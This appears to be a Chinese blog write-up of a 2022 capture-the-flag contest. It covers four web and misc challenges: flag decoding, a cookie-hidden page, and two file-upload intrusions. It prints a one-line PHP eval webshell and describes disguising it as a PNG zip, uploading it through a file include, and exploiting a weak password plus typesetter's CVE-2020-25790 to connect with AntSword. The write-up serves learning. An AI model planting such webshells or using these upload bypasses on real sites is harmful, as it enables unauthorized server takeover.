2022年蓝贝国际创新创业大赛数字技术+信息安全领域赛道网络攻防大赛wp
2022年蓝贝国际创新创业大赛“数字技术+信息安全领域赛道网络攻防大赛”wp
mine

注意观察这个符号,对应的是src.js中的res/face_normal.bmp
进行查找别的face,发现有face_success.bmp

首先进行hex解码

1 | LJWXQ2C2GN2FKYKXGVXGGMTIGFGUQTJQMIZHQ3CJK42GQYKHKZ2VIQ2GN5MVGRTKJVKEEMSZLBFDS=== |
然后进行base32解码

1 | ZmxhZ3tUaW5nc2h1MHM0b2xlIW4haGVuTCFoYSFjMTB2YXJ9 |
然后进行base64解码

flag{Tingshu0s4ole!n!henL!ha!c10var}
cook
查看cookie

然后访问7815696ecbf1c96e6894b779456d330e.php

flag{c7a4c2050907de3b70c519287f171f35}
upload-inc
查看源码,提示include.php

然后访问include.php,查看源码:提示upload.php和参数为file

似乎是原题第十一周 | 签到般的包含 | Danyhug’s Blog (gitee.io)
整一个1.php,写一句话木马
1 | @eval($_POST[1]); |
进行压缩,将压缩文件后缀改为png

进行文件上传

然后蚁剑连接

ezcms
找到登录界面

按照这个做一遍,弱密码登录
typesetter 文件上传(CVE-2020-25790)_xzhome的博客-CSDN博客

然后上传木马1.zip,加压,然后蚁剑直接连接

找到flag.txt

本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Sk1y's Blog!
评论
